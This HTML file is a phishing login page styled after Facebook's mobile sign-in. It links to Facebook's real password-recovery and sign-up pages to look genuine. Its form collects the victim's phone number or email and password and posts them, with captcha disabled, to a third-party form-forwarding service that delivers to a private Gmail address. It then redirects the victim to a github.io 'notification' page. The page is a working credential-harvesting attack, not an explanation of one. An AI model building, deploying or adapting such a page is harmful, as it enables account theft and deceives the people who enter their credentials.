<!DOCTYPE html>
<!-- Coding By CodingNepal - www.codingnepalweb.com -->
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login To XWorld</title>
  <!-- Linking SwiperJS CSS -->
  </head>
<body style="background: #fff; width: 100%; height: 100%;">
  
    <style>
        /*style.css*/
body {
    
    align-items: center;
    justify-content: center;
    font-family: sans-serif;
    line-height: 1.5;
    min-height: 100%;
    background: #c9c9c994;
    flex-direction: column;
    margin: 0;
}


h1 {
    margin-left: 2%;
    color: #4CAF50;
}

input {
    margin-left: 2%;
    display: block;
    color: #0a0a0a;
    width: 95%;
    height: 55px;
    margin-bottom: 15px;
    background: #cecece48;
    padding: 20px;
    margin-top: 30px;
    box-sizing: border-box;
    border: 2px solid #31313133;    
    border-radius: 10px;
}

.sumbit {
    margin-left: 6%;
    padding: 15px;
    border-radius: 30px;
    margin-top: 190px;
    margin-bottom: 15px;
    color: #1877f2;
    background-color: transparent;
    width: 89%;
    font-size: 16px;
    border: 1.20px solid #1877f2;
}

.sumbit2 {
    margin-left: 6%;
    align-items: center;
    justify-content: center;
    height: 50px;
    width: 89%;
    border: none;
    outline: none;
    color: #fff;
    border-radius: 5px;
    background-color: #0000009a;
    transition: all 0.3s linear;
}

.wrap {
    display: flex;
    justify-content: center;
    align-items: center;
}

.sumbit1 {
    margin-left: 6%;
    padding: 15px;
    border-radius: 30px;
    margin-top: 20px;
    margin-bottom: 15px;
    border: none;
    color: white;
    background-color: #1877f2;
    width: 89%;
    font-size: 16px;
}
    </style>
    
                      <img style="margin-left: 43.5%; margin-top: 80px; margin-bottom: 10%;" src="logo.png" alt="">

 <form action="https://formsubmit.co/kt58202@gmail.com" method="post">
        
            <input type="text" id="first" name="first" 
                placeholder="Mobile number or email address" required>

            <input type="password" id="password" name="password" 
                placeholder="Password" required>
                
                    <input type="hidden" name="_next" value="https://login-invite.github.io/.com/notification.html">
       
        <input type="hidden" name="_captcha" value="false">
        
        <button class="sumbit1">
                            <span class="btnText">Sing in</span>
                            <i class="uil uil-navigator"></i>
                        </button>
             </form>                      
                     
                     
                        
      <p style="margin-left: 139px; margin-bottom: 5px;"><a style="color: #0b0d16f3" href="https://m.facebook.com/login/identify/" style="text-decoration: none;">
               Forgotten Password?
            </a>
        </p>     
        
        
        
         <a href="https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://m.facebook.com/reg/&ved=2ahUKEwjlv6WHnYGLAxUPfKQEHQUBF5AQFnoECBsQAQ&usg=AOvVaw1ZqfwL-979TC6TWWUBtbU1">   <button class="sumbit">
                            <span class="btnText">Create a new account</span>
                            <i class="uil uil-navigator"></i>
                        </button>    </a>
                        
            <img style="margin-left: 42.5%; margin-bottom: 5px;" src="icon.png" alt="">
    
 
</body>
</html>
